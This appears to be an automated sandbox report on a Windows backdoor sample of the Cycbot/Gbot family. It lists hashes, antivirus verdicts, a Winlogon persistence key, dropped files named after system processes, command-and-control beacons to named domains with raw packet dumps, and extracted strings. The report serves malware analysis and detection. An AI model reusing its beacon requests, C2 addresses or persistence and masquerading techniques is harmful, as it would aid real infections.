Analysis Date2014-10-14 21:53:21
MD5f21a2ddb6dda772e43e7f855f906cc35
SHA10f970ddf8da5d61badd075a2e295fa74fcb333cf

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7924a4932ac655c61839c9fda3c17e47 sha1: bdd6b05d845af420d04b8fb34cf2bdb652ffb4dd size: 112640
Section.rdata md5: 716381ad0071de2e288e87443bf6a2ae sha1: a7767ec037ab98588eee1966191f39493061063d size: 1024
Section.data md5: e91ba0ff1360a232fd67f93c7a23fb16 sha1: e799c5ed62a877488fa95bd9f24ec5800205009f size: 68608
Section.reloc md5: 2d8ba3dcabf747005e6f9e4462a5efdc sha1: f2b079031352d18e342627a16e83b1638c0d00ee size: 1024
Timestamp2005-09-03 05:09:52
PEhash5fb775f73fda34accdc393c048db5f1a05db4fac
IMPhash37f737a0900fe555627b94358b49bdb9
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-3984
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SYW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Gbot.AX
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.DeadCryptor.01597
AVYara APTno_virus
AVZillya!Trojan.Kryptik.Win32.132812

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSregsysonline.com
Winsock DNS127.0.0.1
Winsock DNSjapanesegreenteaonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2913_appcompat.txt
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1992 -e 152 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1992 -e 152 -g

Network Details:

DNSjapanesegreenteaonline.com
Type: A
66.117.0.221
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSregsysonline.com
Type: A
HTTP GEThttp://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v76=89&tq=gHZutDyMv5rJeTbia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 66.117.0.221:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7637 363d3839 2674713d   1.gif?v76=89&tq=
0x00000030 (00048)   67485a75 7444794d 7635724a 65546269   gHZutDyMv5rJeTbi
0x00000040 (00064)   61396e72 6d736c36 6769577a 2532424a   a9nrmsl6giWz%2BJ
0x00000050 (00080)   5a625679 41253344 20485454 502f312e   ZbVyA%3D HTTP/1.
0x00000060 (00096)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000070 (00112)   6c6f7365 0d0a486f 73743a20 6a617061   lose..Host: japa
0x00000080 (00128)   6e657365 67726565 6e746561 6f6e6c69   nesegreenteaonli
0x00000090 (00144)   6e652e63 6f6d0d0a 41636365 70743a20   ne.com..Accept: 
0x000000a0 (00160)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x000000b0 (00176)   206d6f7a 696c6c61 2f322e30 0d0a0d0a    mozilla/2.0....
0x000000c0 (00192)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 703e0a20   n: close....p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....


Strings
.

080904b0
1.0.0.1
1915
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
```````
^^^^^^++++++++++++++++++
~~~~~~~~~~
<<<<<<<<<
>>>>>>>>
>>>>>>>>>
        ```
    ++
,,,,,,,,,,,,,,,,
;;;;;;;;
:::::::
::::::::
::::::::::
!!!!!!
!!!!!!!!!
''''=--------------;;;;
""""""""
))))))~~~
[[[[[[
[[[[[[[[[[
]]]]]]]]
{{{{{{{{
@@@@@@
@@@@@@@@
$$$$$$$$$
*******
**************
\\\\\\
\\\\\\\\\
\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\
																
@`0)'(
000000
00000000000000000000000000000
0B0t'f/
0b_W@0
" @0o\
111111111MMMMMDDDEEEEEE
19K&@ 
1L?J)t
1oj/}N
 1pcyv.
1^Y:*_
22~~~~~~~~TTTTll
2`IU#5
2l@6|N
2}Mwh~
2TckO-
         %%%%%%%%333
333333
333333333333333333
3333333333333333SSSSSSS
33333OOOOOr
354Y!w
3=bZla
^3!>I1
3o7$@@
3#O&fQ<
3||?PK]'
{3^QWE]: 
3rY%S	
444444
4444444
444444444
 4CpOH
4Z_c;6
@50^S}
\51CHi
5555555
5555555zzz
]55Emm
57bGNx
$$$$$5bbb
5FFFFF
5Y-/hX
66666666
/?$`67
67PC`N
6d$B~'
	6L$j.
^6O35A
^6PEdG
6sI3<5
6!vE$u
6ZF^( 
<+$`@}^7
777[[[[
7AAS9~Z
)+7Jf`
7%ndMI
7nT>N+]4T}B
{{888888888
8i%qeo
8qa,:kN
92:/\k
999999999999999
9999999999999sssssssyyyyyyyy++++++++++
 `9ipA
9Jn>AB
9KsLKzO
9zRg9]
a.@@#6
aaaaaa
ADVAPI32.dll
'<AhbN
!%a}NP
` \aPQ
B3[	H7
b!A7+[
""]bbbb
bbbbbbb`
BBBBBBBB
BBBBBBBBBBB
bbGGGGGGG
~~~~~BB&&iii
/BEA1ZS -
@`b|h 
Bk\@`gw
]bT]cy=r
   Bxxxxxxxxxxxxxx
-C4OCD
?C6W:9%
 `^c7F
cccccc
CCCCCC
 chu. @
C-m`[Cv
CP{dh[6d 
`@[\CPj_m
C[Xhi;
d77777@@@@@@@@@@AO
@.data
DDDDDD
ddddddd)
DDDDDDDDDLLLLLLLLLLLLLLL
DDDDDggg
d%eD.S
 ``Dg,
@D.@@gyF
d:mggQ
dmmmmmm
Dn?&!3~
dP85jB
+Du{^5
DuplicateHandle
?dyfKW;
D%{^YW
` ^e%-
#~\-e@
\e[6>oi
eeeeA===========jjjj
;;;;;;eeeee
EEEEEEEEEEE
eeeeeeeeeee!!!!!ccc
_eeeeJ
EEEErrJ
;)eJQ%
E_lSN\)rlb=h
EnumResourceNamesW
ErthtP
eUH5u0
+,`@/F
``~~~f8
fcct.%
fev.@ 
+::::::::ff**
FFFFFF
ffffffff
FFFFFFFFFL888888
FindClose
FindFirstFileA
FindResourceExA
Fj`I8Y
F*.L{/
FlushInstructionCache
Fnnn11111
'fUD'<
g8\apK
gCf0{HA
GetModuleFileNameW
GGGGGGGG
GGGGGGGGGG
%GGGGGGGGGGG
GGGGGGSSS
\\\\\GGPPPPPPPP
G\I|3R
G-iIfRRc
G;JK~S
g!T1.!
gX| 9<e
hain4lf
hjaWnC
hlg-U=!
``HPSr_
,<i]'&!
I$:52<
iD0lQ`
IE})#C
i.@ gl
,,,,,,,,,iiiii""
@IiOOO
I	jjBI
i-\=&L
&iLv:e
=)	i]nkH
`@Ipla'
iXw|$``
||||||||||j
j(1)HW
'J1zII
)$`@JA
`JBfY\
j	|&Dh
#JedL4
JgU<~9
@/`Jhz
@@+j]j
jjjjjjj
JJJJJJJbb
JJJJJJJJ
jJ?~%"@`v
jmJAit
jw`$ `d
(\_"^!k
KERNEL32.dll
` Kfz;
KKKKKKK
KKKKKKKKKKKK
kkTTTTTT
]k:l|$@
Kr8v]Y
`@" @l`
L33XXXX
L&a]C!
LnN`QQ
.,lNoB\
l/tj&`
Lx02kx	G
M||||||||||||||||||
MapViewOfFile
	MD'rp
@ {MKs
'm lC8
~}ML-IB`U
@M[|M&
,,,,,,mmm
MMMMMM
mmmmmmm
}}}}}MMMMMMMTTTTTTTTT
:::MMMu
mU>C(=Js;
* |>M"v
MwEQmu
M!Xxg+
N18q~J
:N1V1"Y
n|8t%ybe
NdrFixedArrayFree
n!kZ~E
NNNNNNN
NNNNNNN\
NNNNNNNN
nnnnnnnnn
nnnnnnnnnnnnnn
NNNNNNNNNNNNNN
n[{P^	
nZ*r|,
O0R8j#
Oavq"`@K
oc;i|-
oeDeL~q2
%oF`Aky
)o\/L-;
O_{mjG
OX{Vo,>o
	!&P7>M
P/CFKY
PG3`kU
PhA+E$
 @Piq^'
pl$JvE
PLyk[&
pNyem 
PP@@@@@@@@@@
PpE@6q
PPPPPPPPPPPPPPggg
"&.P?S
;PuL2<
pWS'Lu
{q\nLf
^[q	:PGOpy1W
QQQddddddd
qqqqiii
QQQQQQ?
QQQQQQq
qqqqqqqqq
Qsbx%l
r1JD8)
r<:7.CD
R^ct"9
`.rdata
RE4Ky#
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
R)>+FeG
rO(~:6D:Q
RPCRT4.dll
RRRR6666666
rrrrrr
RRRRRRR
rrrrrrrrrrrrrr
RRRRRRRRRRRRRR
&` rS+r
]r,)&|'W
RwR,@@
]ry/O/*
` Rz" 
 , `s%
SCX1vb
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
sQ~gwu
#####ss
==============ssss(((
ssssss
[[[SSSSSSSSn
SSSSSSSSSSSSS
 sUTY_
svy[c<
`@SZWv7
	TbTmNY2
@ 'Te^
tG^ &D
!This program cannot be run in DOS mode.
timeEndPeriod
{`tMA!'
TpnSdy
~t q>6
`TSrFr
't&  T^
T_?t[<
TTTTii44
TTTTTTTT
ttttttttBBBBBBBBB
TTTTTTTTTT
ttttttttttttt
[;TVy	=
TyOB+<
U6w[}4
^&  UD
 u!&DDJ
_U"GEd
UJ?on& 
uklAbh
uln4ym
UnmapViewOfFile
U$@`oQ
]U*,.u~	
UuidCreate
UUUUUUUUUUUU
V5,GU'?
,V5r~)
`@Vd6EB
VF@y/k
V(  )ms,
"?VoFXi
@V_>w?
V&``x||( 
~~~~~~W
w	9t0H
wBjhTj
WceozV
WChC;P^)
WINMM.dll
}w&`@nO
`w"@@%o2
Wq]YY|
WTu^<	_
W	t;xl
??wwwww
wwwwww
WWWWWWOO
wwwwwwwwwmrrrrrrrrrrrrrrr
^XA49}
xmAKsa4
x>Qa\U
@ x`RBw
XXKKKK
XXXXXXX
xxxxxxxxx
xxxxxxxxxx
XXXXXXXXXX!!!!
y23=Ne
y!7/yo
y#<*@`GcF
  YiJ0/J
ynT:7%i
y_N`Wr
Y#OLF8k
^^(yU9999
YuX+w/
y%W92%/ 
yyyyyyyyyyyyyyy
YYYYYYYYYYYYYYYYYYYY
`#z>.?
@{z', `
z \2eS
@Z3d~*
z|}bA2
ZDmJ)n3
Znn8HDX
Z\oW8p
Z!{rLl4
ZSsPY6
zv\WSW
zzfffff
zzz;;;xx
$$$$$zzzz